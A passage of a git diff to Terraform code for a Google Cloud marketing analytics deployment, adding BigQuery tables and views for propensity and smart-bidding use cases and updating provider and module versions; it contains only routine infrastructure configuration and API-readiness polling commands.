The prevent_destroy attribute is set to true, which means that Terraform will prevent the table from being destroyed. + lifecycle { + ignore_changes = all + #prevent_destroy = true + create_before_destroy = true + } + + depends_on = [ + #module.gemini_insights.google_bigquery_dataset, null_resource.check_gemini_model_exists, - null_resource.create_gemini_model ] } \ No newline at end of file diff --git a/infrastructure/terraform/modules/feature-store/bigquery-tables.tf b/infrastructure/terraform/modules/feature-store/bigquery-tables.tf index c968bda2..024c620d 100644 --- a/infrastructure/terraform/modules/feature-store/bigquery-tables.tf +++ b/infrastructure/terraform/modules/feature-store/bigquery-tables.tf @@ -15,10 +15,10 @@ # This resource creates a BigQuery table named audience_segmentation_inference_preparation # in the dataset specified by google_bigquery_dataset.audience_segmentation.dataset_id. resource "google_bigquery_table" "audience_segmentation_inference_preparation" { - project = google_bigquery_dataset.audience_segmentation.project - dataset_id = google_bigquery_dataset.audience_segmentation.dataset_id - table_id = local.config_bigquery.table.audience_segmentation_inference_preparation.table_name - description = local.config_bigquery.table.audience_segmentation_inference_preparation.table_description + project = google_bigquery_dataset.audience_segmentation.project + dataset_id = google_bigquery_dataset.audience_segmentation.dataset_id + table_id = local.config_bigquery.table.audience_segmentation_inference_preparation.table_name + description = local.config_bigquery.table.audience_segmentation_inference_preparation.table_description # The deletion_protection attribute specifies whether the table should be protected from deletion. In this case, it's set to false, which means that the table can be deleted. deletion_protection = false @@ -34,10 +34,10 @@ resource "google_bigquery_table" "audience_segmentation_inference_preparation" { # This resource creates a BigQuery table named customer_lifetime_value_inference_preparation # in the dataset specified by google_bigquery_dataset.customer_lifetime_value.dataset_id. resource "google_bigquery_table" "customer_lifetime_value_inference_preparation" { - project = google_bigquery_dataset.customer_lifetime_value.project - dataset_id = google_bigquery_dataset.customer_lifetime_value.dataset_id - table_id = local.config_bigquery.table.customer_lifetime_value_inference_preparation.table_name - description = local.config_bigquery.table.customer_lifetime_value_inference_preparation.table_description + project = google_bigquery_dataset.customer_lifetime_value.project + dataset_id = google_bigquery_dataset.customer_lifetime_value.dataset_id + table_id = local.config_bigquery.table.customer_lifetime_value_inference_preparation.table_name + description = local.config_bigquery.table.customer_lifetime_value_inference_preparation.table_description # The deletion_protection attribute specifies whether the table should be protected from deletion. In this case, it's set to false, which means that the table can be deleted. deletion_protection = false @@ -53,10 +53,10 @@ resource "google_bigquery_table" "customer_lifetime_value_inference_preparation" # This resource creates a BigQuery table named customer_lifetime_value_label # in the dataset specified by google_bigquery_dataset.feature_store.dataset_id. 
resource "google_bigquery_table" "customer_lifetime_value_label" { - project = google_bigquery_dataset.feature_store.project - dataset_id = google_bigquery_dataset.feature_store.dataset_id - table_id = local.config_bigquery.table.customer_lifetime_value_label.table_name - description = local.config_bigquery.table.customer_lifetime_value_label.table_description + project = google_bigquery_dataset.feature_store.project + dataset_id = google_bigquery_dataset.feature_store.dataset_id + table_id = local.config_bigquery.table.customer_lifetime_value_label.table_name + description = local.config_bigquery.table.customer_lifetime_value_label.table_description # The deletion_protection attribute specifies whether the table should be protected from deletion. In this case, it's set to false, which means that the table can be deleted. deletion_protection = false @@ -79,10 +79,10 @@ resource "google_bigquery_table" "customer_lifetime_value_label" { # This resource creates a BigQuery table named purchase_propensity_inference_preparation # in the dataset specified by google_bigquery_dataset.purchase_propensity.dataset_id. resource "google_bigquery_table" "purchase_propensity_inference_preparation" { - project = google_bigquery_dataset.purchase_propensity.project - dataset_id = google_bigquery_dataset.purchase_propensity.dataset_id - table_id = local.config_bigquery.table.purchase_propensity_inference_preparation.table_name - description = local.config_bigquery.table.purchase_propensity_inference_preparation.table_description + project = google_bigquery_dataset.purchase_propensity.project + dataset_id = google_bigquery_dataset.purchase_propensity.dataset_id + table_id = local.config_bigquery.table.purchase_propensity_inference_preparation.table_name + description = local.config_bigquery.table.purchase_propensity_inference_preparation.table_description # The deletion_protection attribute specifies whether the table should be protected from deletion. In this case, it's set to false, which means that the table can be deleted. deletion_protection = false @@ -97,10 +97,10 @@ resource "google_bigquery_table" "purchase_propensity_inference_preparation" { # This resource creates a BigQuery table named churn_propensity_inference_preparation # in the dataset specified by google_bigquery_dataset.churn_propensity.dataset_id. resource "google_bigquery_table" "churn_propensity_inference_preparation" { - project = google_bigquery_dataset.churn_propensity.project - dataset_id = google_bigquery_dataset.churn_propensity.dataset_id - table_id = local.config_bigquery.table.churn_propensity_inference_preparation.table_name - description = local.config_bigquery.table.churn_propensity_inference_preparation.table_description + project = google_bigquery_dataset.churn_propensity.project + dataset_id = google_bigquery_dataset.churn_propensity.dataset_id + table_id = local.config_bigquery.table.churn_propensity_inference_preparation.table_name + description = local.config_bigquery.table.churn_propensity_inference_preparation.table_description # The deletion_protection attribute specifies whether the table should be protected from deletion. In this case, it's set to false, which means that the table can be deleted. 
deletion_protection = false @@ -112,13 +112,31 @@ resource "google_bigquery_table" "churn_propensity_inference_preparation" { schema = file("${local.sql_dir}/schema/table/churn_propensity_inference_preparation.json") } +# This resource creates a BigQuery table named lead_score_propensity_inference_preparation +# in the dataset specified by google_bigquery_dataset.lead_score_propensity.dataset_id. +resource "google_bigquery_table" "lead_score_propensity_inference_preparation" { + project = google_bigquery_dataset.lead_score_propensity.project + dataset_id = google_bigquery_dataset.lead_score_propensity.dataset_id + table_id = local.config_bigquery.table.lead_score_propensity_inference_preparation.table_name + description = local.config_bigquery.table.lead_score_propensity_inference_preparation.table_description + + # The deletion_protection attribute specifies whether the table should be protected from deletion. In this case, it's set to false, which means that the table can be deleted. + deletion_protection = false + labels = { + version = "prod" + } + + # The schema attribute specifies the schema of the table. In this case, the schema is defined in the JSON file. + schema = file("${local.sql_dir}/schema/table/lead_score_propensity_inference_preparation.json") +} + # This resource creates a BigQuery table named purchase_propensity_label # in the dataset specified by google_bigquery_dataset.feature_store.dataset_id. resource "google_bigquery_table" "purchase_propensity_label" { - project = google_bigquery_dataset.feature_store.project - dataset_id = google_bigquery_dataset.feature_store.dataset_id - table_id = local.config_bigquery.table.purchase_propensity_label.table_name - description = local.config_bigquery.table.purchase_propensity_label.table_description + project = google_bigquery_dataset.feature_store.project + dataset_id = google_bigquery_dataset.feature_store.dataset_id + table_id = local.config_bigquery.table.purchase_propensity_label.table_name + description = local.config_bigquery.table.purchase_propensity_label.table_description # The deletion_protection attribute specifies whether the table should be protected from deletion. In this case, it's set to false, which means that the table can be deleted. deletion_protection = false @@ -140,10 +158,10 @@ resource "google_bigquery_table" "purchase_propensity_label" { # This resource creates a BigQuery table named churn_propensity_label # in the dataset specified by google_bigquery_dataset.feature_store.dataset_id. resource "google_bigquery_table" "churn_propensity_label" { - project = google_bigquery_dataset.feature_store.project - dataset_id = google_bigquery_dataset.feature_store.dataset_id - table_id = local.config_bigquery.table.churn_propensity_label.table_name - description = local.config_bigquery.table.churn_propensity_label.table_description + project = google_bigquery_dataset.feature_store.project + dataset_id = google_bigquery_dataset.feature_store.dataset_id + table_id = local.config_bigquery.table.churn_propensity_label.table_name + description = local.config_bigquery.table.churn_propensity_label.table_description # The deletion_protection attribute specifies whether the table should be protected from deletion. In this case, it's set to false, which means that the table can be deleted. 
deletion_protection = false @@ -162,13 +180,38 @@ resource "google_bigquery_table" "churn_propensity_label" { } } +# This resource creates a BigQuery table named lead_score_propensity_label +# in the dataset specified by google_bigquery_dataset.feature_store.dataset_id. +resource "google_bigquery_table" "lead_score_propensity_label" { + project = google_bigquery_dataset.feature_store.project + dataset_id = google_bigquery_dataset.feature_store.dataset_id + table_id = local.config_bigquery.table.lead_score_propensity_label.table_name + description = local.config_bigquery.table.lead_score_propensity_label.table_description + + # The deletion_protection attribute specifies whether the table should be protected from deletion. In this case, it's set to false, which means that the table can be deleted. + deletion_protection = false + labels = { + version = "prod" + } + + # The schema attribute specifies the schema of the table. In this case, the schema is defined in the JSON file. + schema = file("${local.sql_dir}/schema/table/lead_score_propensity_label.json") + + # The lifecycle block is used to configure the lifecycle of the table. In this case, the ignore_changes attribute is set to all, which means that Terraform will ignore + # any changes to the table and will not attempt to update the table. The prevent_destroy attribute is set to true, which means that Terraform will prevent the table from being destroyed. + lifecycle { + ignore_changes = all + prevent_destroy = true + } +} + # This resource creates a BigQuery table named user_dimensions # in the dataset specified by google_bigquery_dataset.feature_store.dataset_id. resource "google_bigquery_table" "user_dimensions" { - project = google_bigquery_dataset.feature_store.project - dataset_id = google_bigquery_dataset.feature_store.dataset_id - table_id = local.config_bigquery.table.user_dimensions.table_name - description = local.config_bigquery.table.user_dimensions.table_description + project = google_bigquery_dataset.feature_store.project + dataset_id = google_bigquery_dataset.feature_store.dataset_id + table_id = local.config_bigquery.table.user_dimensions.table_name + description = local.config_bigquery.table.user_dimensions.table_description # The deletion_protection attribute specifies whether the table should be protected from deletion. In this case, it's set to false, which means that the table can be deleted. deletion_protection = false @@ -190,10 +233,10 @@ resource "google_bigquery_table" "user_dimensions" { # This resource creates a BigQuery table named user_lifetime_dimensions # in the dataset specified by google_bigquery_dataset.feature_store.dataset_id. resource "google_bigquery_table" "user_lifetime_dimensions" { - project = google_bigquery_dataset.feature_store.project - dataset_id = google_bigquery_dataset.feature_store.dataset_id - table_id = local.config_bigquery.table.user_lifetime_dimensions.table_name - description = local.config_bigquery.table.user_lifetime_dimensions.table_description + project = google_bigquery_dataset.feature_store.project + dataset_id = google_bigquery_dataset.feature_store.dataset_id + table_id = local.config_bigquery.table.user_lifetime_dimensions.table_name + description = local.config_bigquery.table.user_lifetime_dimensions.table_description # The deletion_protection attribute specifies whether the table should be protected from deletion. In this case, it's set to false, which means that the table can be deleted. 
deletion_protection = false @@ -215,10 +258,10 @@ resource "google_bigquery_table" "user_lifetime_dimensions" { # This resource creates a BigQuery table named user_lookback_metrics # in the dataset specified by google_bigquery_dataset.feature_store.dataset_id. resource "google_bigquery_table" "user_lookback_metrics" { - project = google_bigquery_dataset.feature_store.project - dataset_id = google_bigquery_dataset.feature_store.dataset_id - table_id = local.config_bigquery.table.user_lookback_metrics.table_name - description = local.config_bigquery.table.user_lookback_metrics.table_description + project = google_bigquery_dataset.feature_store.project + dataset_id = google_bigquery_dataset.feature_store.dataset_id + table_id = local.config_bigquery.table.user_lookback_metrics.table_name + description = local.config_bigquery.table.user_lookback_metrics.table_description # The deletion_protection attribute specifies whether the table should be protected from deletion. In this case, it's set to false, which means that the table can be deleted. deletion_protection = false @@ -240,10 +283,10 @@ resource "google_bigquery_table" "user_lookback_metrics" { # This resource creates a BigQuery table named user_rolling_window_lifetime_metrics # in the dataset specified by google_bigquery_dataset.feature_store.dataset_id. resource "google_bigquery_table" "user_rolling_window_lifetime_metrics" { - project = google_bigquery_dataset.feature_store.project - dataset_id = google_bigquery_dataset.feature_store.dataset_id - table_id = local.config_bigquery.table.user_rolling_window_lifetime_metrics.table_name - description = local.config_bigquery.table.user_rolling_window_lifetime_metrics.table_description + project = google_bigquery_dataset.feature_store.project + dataset_id = google_bigquery_dataset.feature_store.dataset_id + table_id = local.config_bigquery.table.user_rolling_window_lifetime_metrics.table_name + description = local.config_bigquery.table.user_rolling_window_lifetime_metrics.table_description # The deletion_protection attribute specifies whether the table should be protected from deletion. In this case, it's set to false, which means that the table can be deleted. deletion_protection = false @@ -265,10 +308,10 @@ resource "google_bigquery_table" "user_rolling_window_lifetime_metrics" { # This resource creates a BigQuery table named user_rolling_window_metrics # in the dataset specified by google_bigquery_dataset.feature_store.dataset_id. resource "google_bigquery_table" "user_rolling_window_metrics" { - project = google_bigquery_dataset.feature_store.project - dataset_id = google_bigquery_dataset.feature_store.dataset_id - table_id = local.config_bigquery.table.user_rolling_window_metrics.table_name - description = local.config_bigquery.table.user_rolling_window_metrics.table_description + project = google_bigquery_dataset.feature_store.project + dataset_id = google_bigquery_dataset.feature_store.dataset_id + table_id = local.config_bigquery.table.user_rolling_window_metrics.table_name + description = local.config_bigquery.table.user_rolling_window_metrics.table_description # The deletion_protection attribute specifies whether the table should be protected from deletion. In this case, it's set to false, which means that the table can be deleted. 
deletion_protection = false @@ -287,13 +330,38 @@ resource "google_bigquery_table" "user_rolling_window_metrics" { } } +# This resource creates a BigQuery table named user_rolling_window_lead_metrics +# in the dataset specified by google_bigquery_dataset.feature_store.dataset_id. +resource "google_bigquery_table" "user_rolling_window_lead_metrics" { + project = google_bigquery_dataset.feature_store.project + dataset_id = google_bigquery_dataset.feature_store.dataset_id + table_id = local.config_bigquery.table.user_rolling_window_lead_metrics.table_name + description = local.config_bigquery.table.user_rolling_window_lead_metrics.table_description + + # The deletion_protection attribute specifies whether the table should be protected from deletion. In this case, it's set to false, which means that the table can be deleted. + deletion_protection = false + labels = { + version = "prod" + } + + # The schema attribute specifies the schema of the table. In this case, the schema is defined in the JSON file. + schema = file("${local.sql_dir}/schema/table/user_rolling_window_lead_metrics.json") + + # The lifecycle block is used to configure the lifecycle of the table. In this case, the ignore_changes attribute is set to all, which means that Terraform will ignore + # any changes to the table and will not attempt to update the table. The prevent_destroy attribute is set to true, which means that Terraform will prevent the table from being destroyed. + lifecycle { + ignore_changes = all + prevent_destroy = true + } +} + # This resource creates a BigQuery table named user_scoped_lifetime_metrics # in the dataset specified by google_bigquery_dataset.feature_store.dataset_id. resource "google_bigquery_table" "user_scoped_lifetime_metrics" { - project = google_bigquery_dataset.feature_store.project - dataset_id = google_bigquery_dataset.feature_store.dataset_id - table_id = local.config_bigquery.table.user_scoped_lifetime_metrics.table_name - description = local.config_bigquery.table.user_scoped_lifetime_metrics.table_description + project = google_bigquery_dataset.feature_store.project + dataset_id = google_bigquery_dataset.feature_store.dataset_id + table_id = local.config_bigquery.table.user_scoped_lifetime_metrics.table_name + description = local.config_bigquery.table.user_scoped_lifetime_metrics.table_description # The deletion_protection attribute specifies whether the table should be protected from deletion. In this case, it's set to false, which means that the table can be deleted. deletion_protection = false @@ -315,10 +383,10 @@ resource "google_bigquery_table" "user_scoped_lifetime_metrics" { # This resource creates a BigQuery table named user_scoped_metrics # in the dataset specified by google_bigquery_dataset.feature_store.dataset_id. resource "google_bigquery_table" "user_scoped_metrics" { - project = google_bigquery_dataset.feature_store.project - dataset_id = google_bigquery_dataset.feature_store.dataset_id - table_id = local.config_bigquery.table.user_scoped_metrics.table_name - description = local.config_bigquery.table.user_scoped_metrics.table_description + project = google_bigquery_dataset.feature_store.project + dataset_id = google_bigquery_dataset.feature_store.dataset_id + table_id = local.config_bigquery.table.user_scoped_metrics.table_name + description = local.config_bigquery.table.user_scoped_metrics.table_description # The deletion_protection attribute specifies whether the table should be protected from deletion. 
In this case, it's set to false, which means that the table can be deleted. deletion_protection = false @@ -340,10 +408,10 @@ resource "google_bigquery_table" "user_scoped_metrics" { # This resource creates a BigQuery table named user_scoped_segmentation_metrics # in the dataset specified by google_bigquery_dataset.feature_store.dataset_id. resource "google_bigquery_table" "user_scoped_segmentation_metrics" { - project = google_bigquery_dataset.feature_store.project - dataset_id = google_bigquery_dataset.feature_store.dataset_id - table_id = local.config_bigquery.table.user_scoped_segmentation_metrics.table_name - description = local.config_bigquery.table.user_scoped_segmentation_metrics.table_description + project = google_bigquery_dataset.feature_store.project + dataset_id = google_bigquery_dataset.feature_store.dataset_id + table_id = local.config_bigquery.table.user_scoped_segmentation_metrics.table_name + description = local.config_bigquery.table.user_scoped_segmentation_metrics.table_description # The deletion_protection attribute specifies whether the table should be protected from deletion. In this case, it's set to false, which means that the table can be deleted. deletion_protection = false @@ -365,10 +433,10 @@ resource "google_bigquery_table" "user_scoped_segmentation_metrics" { # This resource creates a BigQuery table named user_segmentation_dimensions # in the dataset specified by google_bigquery_dataset.feature_store.dataset_id. resource "google_bigquery_table" "user_segmentation_dimensions" { - project = google_bigquery_dataset.feature_store.project - dataset_id = google_bigquery_dataset.feature_store.dataset_id - table_id = local.config_bigquery.table.user_segmentation_dimensions.table_name - description = local.config_bigquery.table.user_segmentation_dimensions.table_description + project = google_bigquery_dataset.feature_store.project + dataset_id = google_bigquery_dataset.feature_store.dataset_id + table_id = local.config_bigquery.table.user_segmentation_dimensions.table_name + description = local.config_bigquery.table.user_segmentation_dimensions.table_description # The deletion_protection attribute specifies whether the table should be protected from deletion. In this case, it's set to false, which means that the table can be deleted. deletion_protection = false @@ -390,10 +458,10 @@ resource "google_bigquery_table" "user_segmentation_dimensions" { # This resource creates a BigQuery table named user_session_event_aggregated_metrics # in the dataset specified by google_bigquery_dataset.feature_store.dataset_id. resource "google_bigquery_table" "user_session_event_aggregated_metrics" { - project = google_bigquery_dataset.feature_store.project - dataset_id = google_bigquery_dataset.feature_store.dataset_id - table_id = local.config_bigquery.table.user_session_event_aggregated_metrics.table_name - description = local.config_bigquery.table.user_session_event_aggregated_metrics.table_description + project = google_bigquery_dataset.feature_store.project + dataset_id = google_bigquery_dataset.feature_store.dataset_id + table_id = local.config_bigquery.table.user_session_event_aggregated_metrics.table_name + description = local.config_bigquery.table.user_session_event_aggregated_metrics.table_description # The deletion_protection attribute specifies whether the table should be protected from deletion. In this case, it's set to false, which means that the table can be deleted. 
deletion_protection = false @@ -412,4 +480,27 @@ resource "google_bigquery_table" "user_session_event_aggregated_metrics" { } } +# This resource creates a BigQuery table named predictions_placeholder +# in the dataset specified by google_bigquery_dataset.purchase_propensity +resource "google_bigquery_table" "purchase_propurchase_propensity_predictions_placeholder" { + project = google_bigquery_dataset.purchase_propensity.project + dataset_id = google_bigquery_dataset.purchase_propensity.dataset_id + table_id = "predictions_placeholder" + description = "Dummy table to facilitate the creation of downstream dependent views" + + # The deletion_protection attribute specifies whether the table should be protected from deletion. In this case, it's set to false, which means that the table can be deleted. + deletion_protection = false + labels = { + version = "prod" + } + + # The schema attribute specifies the schema of the table. In this case, the schema is defined in the JSON file. + schema = file("${local.sql_dir}/schema/table/purchase_propensity_predictions_placeholder.json") + + # The lifecycle block is used to configure the lifecycle of the table. In this case, the ignore_changes attribute is set to all, which means that Terraform will ignore + # any changes to the table and will not attempt to update the table. + lifecycle { + ignore_changes = all + } +} diff --git a/infrastructure/terraform/modules/feature-store/main.tf b/infrastructure/terraform/modules/feature-store/main.tf index a17662bb..318639c6 100644 --- a/infrastructure/terraform/modules/feature-store/main.tf +++ b/infrastructure/terraform/modules/feature-store/main.tf @@ -17,128 +17,20 @@ data "local_file" "config_vars" { } locals { + source_root_dir = "../../.." config_vars = yamldecode(data.local_file.config_vars.content) config_bigquery = local.config_vars.bigquery feature_store_project_id = local.config_vars.bigquery.dataset.feature_store.project_id sql_dir = var.sql_dir_input - poetry_run_alias = "${var.poetry_cmd} run" builder_repository_id = "marketing-analytics-jumpstart-base-repo" - purchase_propensity_project_id = null_resource.check_bigquery_api.id != "" ? local.config_vars.bigquery.dataset.purchase_propensity.project_id : local.feature_store_project_id - churn_propensity_project_id = null_resource.check_bigquery_api.id != "" ? local.config_vars.bigquery.dataset.churn_propensity.project_id : local.feature_store_project_id - audience_segmentation_project_id = null_resource.check_bigquery_api.id != "" ? local.config_vars.bigquery.dataset.audience_segmentation.project_id : local.feature_store_project_id - auto_audience_segmentation_project_id = null_resource.check_bigquery_api.id != "" ? local.config_vars.bigquery.dataset.auto_audience_segmentation.project_id : local.feature_store_project_id - aggregated_vbb_project_id = null_resource.check_bigquery_api.id != "" ? local.config_vars.bigquery.dataset.aggregated_vbb.project_id : local.feature_store_project_id - customer_lifetime_value_project_id = null_resource.check_bigquery_api.id != "" ? local.config_vars.bigquery.dataset.customer_lifetime_value.project_id : local.feature_store_project_id - aggregate_predictions_project_id = null_resource.check_bigquery_api.id != "" ? local.config_vars.bigquery.dataset.aggregated_predictions.project_id : local.feature_store_project_id - gemini_insights_project_id = null_resource.check_bigquery_api.id != "" ?
local.config_vars.bigquery.dataset.gemini_insights.project_id : local.feature_store_project_id -} - -module "project_services" { - source = "terraform-google-modules/project-factory/google//modules/project_services" - version = "14.1.0" - - disable_dependent_services = true - disable_services_on_destroy = false - - project_id = local.feature_store_project_id - - activate_apis = [ - "artifactregistry.googleapis.com", - "cloudbuild.googleapis.com", - "aiplatform.googleapis.com", - "logging.googleapis.com", - "monitoring.googleapis.com", - "bigquery.googleapis.com", - "bigquerystorage.googleapis.com", - "storage.googleapis.com", - "storage-api.googleapis.com", - ] -} - -# This resource executes gcloud commands to check whether the BigQuery API is enabled. -# Since enabling APIs can take a few seconds, we need to make the deployment wait until the API is enabled before resuming. -resource "null_resource" "check_bigquery_api" { - provisioner "local-exec" { - command = <<-EOT - COUNTER=0 - MAX_TRIES=100 - while ! gcloud services list --project=${module.project_services.project_id} | grep -i "bigquery.googleapis.com" && [ $COUNTER -lt $MAX_TRIES ] - do - sleep 6 - printf "." - COUNTER=$((COUNTER + 1)) - done - if [ $COUNTER -eq $MAX_TRIES ]; then - echo "bigquery api is not enabled, terraform can not continue!" - exit 1 - fi - sleep 20 - EOT - } - - depends_on = [ - module.project_services - ] -} - - -# This resource executes gcloud commands to check whether the aiplatform API is enabled. -# Since enabling APIs can take a few seconds, we need to make the deployment wait until the API is enabled before resuming. -resource "null_resource" "check_aiplatform_api" { - provisioner "local-exec" { - command = <<-EOT - COUNTER=0 - MAX_TRIES=100 - while ! gcloud services list --project=${module.project_services.project_id} | grep -i "aiplatform.googleapis.com" && [ $COUNTER -lt $MAX_TRIES ] - do - sleep 6 - printf "." - COUNTER=$((COUNTER + 1)) - done - if [ $COUNTER -eq $MAX_TRIES ]; then - echo "aiplatform api is not enabled, terraform can not continue!" - exit 1 - fi - sleep 20 - EOT - } - - depends_on = [ - module.project_services - ] -} - - -## This creates a cloud resource connection. -## Note: The cloud resource nested object has only one output only field - serviceAccountId. -resource "google_bigquery_connection" "vertex_ai_connection" { - connection_id = "vertex_ai" - project = null_resource.check_aiplatform_api.id != "" ? module.project_services.project_id : local.feature_store_project_id - location = local.config_bigquery.region - cloud_resource {} -} - - -# This resource binds the service account to the required roles -resource "google_project_iam_member" "vertex_ai_connection_sa_roles" { - depends_on = [ - module.project_services, - null_resource.check_aiplatform_api, - google_bigquery_connection.vertex_ai_connection - ] - - project = null_resource.check_aiplatform_api.id != "" ? 
module.project_services.project_id : local.feature_store_project_id - member = "serviceAccount:${google_bigquery_connection.vertex_ai_connection.cloud_resource[0].service_account_id}" - - for_each = toset([ - "roles/bigquery.jobUser", - "roles/bigquery.dataEditor", - "roles/storage.admin", - "roles/storage.objectViewer", - "roles/aiplatform.user", - "roles/bigquery.connectionUser", - "roles/bigquery.connectionAdmin" - ]) - role = each.key + purchase_propensity_project_id = local.config_vars.bigquery.dataset.purchase_propensity.project_id + churn_propensity_project_id = local.config_vars.bigquery.dataset.churn_propensity.project_id + lead_score_propensity_project_id = local.config_vars.bigquery.dataset.lead_score_propensity.project_id + audience_segmentation_project_id = local.config_vars.bigquery.dataset.audience_segmentation.project_id + auto_audience_segmentation_project_id = local.config_vars.bigquery.dataset.auto_audience_segmentation.project_id + aggregated_vbb_project_id = local.config_vars.bigquery.dataset.aggregated_vbb.project_id + customer_lifetime_value_project_id = local.config_vars.bigquery.dataset.customer_lifetime_value.project_id + aggregate_predictions_project_id = local.config_vars.bigquery.dataset.aggregated_predictions.project_id + gemini_insights_project_id = local.config_vars.bigquery.dataset.gemini_insights.project_id } diff --git a/infrastructure/terraform/modules/feature-store/outputs.tf b/infrastructure/terraform/modules/feature-store/outputs.tf new file mode 100644 index 00000000..2e9d4535 --- /dev/null +++ b/infrastructure/terraform/modules/feature-store/outputs.tf @@ -0,0 +1,18 @@ +# Copyright 2023 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. 
+ +output "purchase_propensity_dataset_id" { + description = "Purchase Propensity use case dataset" + value = google_bigquery_dataset.purchase_propensity.dataset_id +} \ No newline at end of file diff --git a/infrastructure/terraform/modules/feature-store/variables.tf b/infrastructure/terraform/modules/feature-store/variables.tf index d20b92b7..a9bc07a5 100644 --- a/infrastructure/terraform/modules/feature-store/variables.tf +++ b/infrastructure/terraform/modules/feature-store/variables.tf @@ -37,8 +37,8 @@ variable "sql_dir_input" { description = "SQL queries directory" } -variable "poetry_cmd" { - description = "alias for poetry command on the current system" +variable "uv_run_alias" { + description = "alias for uv run command on the current system" type = string - default = "poetry" + default = "uv run" } diff --git a/infrastructure/terraform/modules/feature-store/versions.tf b/infrastructure/terraform/modules/feature-store/versions.tf index 5a896e28..2e275387 100644 --- a/infrastructure/terraform/modules/feature-store/versions.tf +++ b/infrastructure/terraform/modules/feature-store/versions.tf @@ -20,7 +20,12 @@ terraform { required_providers { google = { source = "hashicorp/google" - version = ">= 3.43.0, >= 3.53.0, >= 3.63.0, >= 4.83.0, < 5.0.0, < 6.0.0" + version = "5.45.0" + } + + google-beta = { + source = "hashicorp/google-beta" + version = "5.45.0" } } diff --git a/infrastructure/terraform/modules/monitor/main.tf b/infrastructure/terraform/modules/monitor/main.tf index 21252202..75ceef35 100644 --- a/infrastructure/terraform/modules/monitor/main.tf +++ b/infrastructure/terraform/modules/monitor/main.tf @@ -32,7 +32,7 @@ locals { module "project_services" { source = "terraform-google-modules/project-factory/google//modules/project_services" - version = "14.1.0" + version = "18.0.0" disable_dependent_services = false disable_services_on_destroy = false @@ -72,7 +72,7 @@ resource "null_resource" "check_bigquery_api" { module "dashboard_bigquery" { source = "terraform-google-modules/bigquery/google" - version = "~> 5.4" + version = "9.0.0" dataset_id = local.dashboard_dataset_name dataset_name = local.dashboard_dataset_name @@ -95,7 +95,7 @@ module "dashboard_bigquery" { module "load_bucket" { source = "terraform-google-modules/cloud-storage/google//modules/simple_bucket" - version = "~> 3.4.1" + version = "9.0.1" project_id = module.project_services.project_id name = "maj-monitor-${module.project_services.project_id}" location = var.location @@ -163,7 +163,7 @@ locals { module "log_export_bigquery" { source = "terraform-google-modules/bigquery/google" - version = "~> 5.4" + version = "9.0.0" dataset_id = local.log_dataset_name dataset_name = local.log_dataset_name @@ -250,12 +250,36 @@ data "template_file" "looker_studio_dashboard_url" { mds_ga4_product_dataset = "marketing_ga4_v1_${var.mds_dataset_suffix}" mds_ga4_base_dataset = "marketing_ga4_base_${var.mds_dataset_suffix}" mds_ads_product_dataset = "marketing_ads_v1_${var.mds_dataset_suffix}" + mds_ads_base_dataset = "marketing_ads_base_${var.mds_dataset_suffix}" logs_dataset = module.log_export_bigquery.bigquery_dataset.dataset_id aggregated_vbb_dataset = "aggregated_vbb" aggregated_predictions_dataset = "aggregated_predictions" gemini_insights_dataset = "gemini_insights" + purchase_propensity_dataset = var.purchase_propensity_dataset_id dataform_log_table_id = local.dataform_log_table_id vertex_pipelines_log_table_id = local.vertex_pipelines_log_table_id dataflow_log_table_id = local.dataflow_log_table_id } } + +data 
"template_file" "purchase_propensity_prediction_stats_query" { + template = file("${local.source_root_dir}/templates/purchase_propensity_smart_bidding_view.sql.tpl") + vars = { + project_id = var.feature_store_project_id + purchase_propensity_dataset = var.purchase_propensity_dataset_id + activation_dataset = "activation" + smart_bidding_configuration_table = var.smart_bidding_configuration_table + } +} + +resource "google_bigquery_table" "purchase_propensity_prediction_stats" { + project = var.feature_store_project_id + dataset_id = var.purchase_propensity_dataset_id + table_id = "purchase_propensity_prediction_stats" + deletion_protection = false + + view { + query = data.template_file.purchase_propensity_prediction_stats_query.rendered + use_legacy_sql = false + } +} diff --git a/infrastructure/terraform/modules/monitor/variables.tf b/infrastructure/terraform/modules/monitor/variables.tf index a6323d88..83b59880 100644 --- a/infrastructure/terraform/modules/monitor/variables.tf +++ b/infrastructure/terraform/modules/monitor/variables.tf @@ -52,3 +52,12 @@ variable "activation_project_id" { type = string } +variable "purchase_propensity_dataset_id" { + description = "Purchase Propensity use case dataset" + type = string +} + +variable "smart_bidding_configuration_table" { + description = "smart bidding configuration table name" + type = string +} diff --git a/infrastructure/terraform/modules/monitor/versions.tf b/infrastructure/terraform/modules/monitor/versions.tf index 5a896e28..2e275387 100644 --- a/infrastructure/terraform/modules/monitor/versions.tf +++ b/infrastructure/terraform/modules/monitor/versions.tf @@ -20,7 +20,12 @@ terraform { required_providers { google = { source = "hashicorp/google" - version = ">= 3.43.0, >= 3.53.0, >= 3.63.0, >= 4.83.0, < 5.0.0, < 6.0.0" + version = "5.45.0" + } + + google-beta = { + source = "hashicorp/google-beta" + version = "5.45.0" } } diff --git a/infrastructure/terraform/modules/pipelines/main.tf b/infrastructure/terraform/modules/pipelines/main.tf index 05d4969b..5c5db7d3 100644 --- a/infrastructure/terraform/modules/pipelines/main.tf +++ b/infrastructure/terraform/modules/pipelines/main.tf @@ -35,9 +35,9 @@ locals { module "project_services" { source = "terraform-google-modules/project-factory/google//modules/project_services" - version = "14.1.0" + version = "18.0.0" - disable_dependent_services = true + disable_dependent_services = false disable_services_on_destroy = false project_id = local.pipeline_vars.project_id @@ -52,7 +52,9 @@ module "project_services" { "artifactregistry.googleapis.com", "aiplatform.googleapis.com", "dataflow.googleapis.com", - "bigqueryconnection.googleapis.com" + "bigqueryconnection.googleapis.com", + "servicenetworking.googleapis.com", + "compute.googleapis.com" ] } @@ -159,4 +161,30 @@ resource "null_resource" "check_artifactregistry_api" { depends_on = [ module.project_services ] -} \ No newline at end of file +} + +# This resource executes gcloud commands to check whether the Service Networking API is enabled. +# Since enabling APIs can take a few seconds, we need to make the deployment wait until the API is enabled before resuming. +resource "null_resource" "check_servicenetworking_api" { + provisioner "local-exec" { + command = <<-EOT + COUNTER=0 + MAX_TRIES=100 + while ! gcloud services list --project=${module.project_services.project_id} | grep -i "servicenetworking.googleapis.com" && [ $COUNTER -lt $MAX_TRIES ] + do + sleep 6 + printf "." 
